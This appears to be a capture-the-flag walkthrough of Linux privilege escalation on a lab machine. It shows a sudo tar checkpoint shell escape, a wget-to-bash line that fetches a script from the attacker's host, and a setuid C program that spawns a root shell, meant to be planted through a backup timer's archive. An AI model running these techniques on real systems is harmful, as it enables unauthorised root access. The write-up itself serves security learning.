Elevating Privileges
Running the following command we can see commands that we can execute without a sudo password
Upon reading on the tar manual, we can actually use tar to spawn a shell!, wtf?!
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Post Exploitation Enumeration
wget http://10.10.14.34:80/LinEnum.sh | bash
The way we’re going to escalate privileges is by creating our own compressed file that contains an SUID executable.
$ locate backuper
/etc/systemd/system/multi-user.target.wants/backuperer.timer
/lib/systemd/system/backuperer.service
/lib/systemd/system/backuperer.timer
/usr/sbin/backuperer
The way we’re going to escalate privileges is by creating our own compressed file that contains an SUID executable.
Create a file on our attacker machine
#include <unistd.h>
int main()
{
setuid(0);
execl("/bin/bash", "bash", (char *)NULL);
return 0;
}
gcc -m32 -o setuid setuid.c
chmod u+s setuid
root@kali:/var/www/html# ls -l
total 776
-rw-r--r-- 1 root root 10701 May 8 2020 index.html
-rw-r--r-- 1 root root 612 May 8 2020 index.nginx-debian.html
-rwxr-xr-x 1 root root 46631 Oct 15 08:39 LinEnum.sh
-rw-r--r-- 1 root root 706130 Aug 24 17:17 Resume.pdf
-rwsr-xr-x 1 root root 15520 Nov 9 09:22 setuid
-rw-r--r-- 1 root root 110 Nov 9 09:18 setuid.c
-rw-r--r-- 1 root root 0 Aug 10 22:02 test.py
Compress the var directory and save it to the file called exploit
tar -zcvf exploit var
copy to our target machine in /var/tmp
attack machine: python -m SimpleHTTPServer 80
target machine: wget http://10.10.14.34:80/exploit
check time with
systemctl list-timers
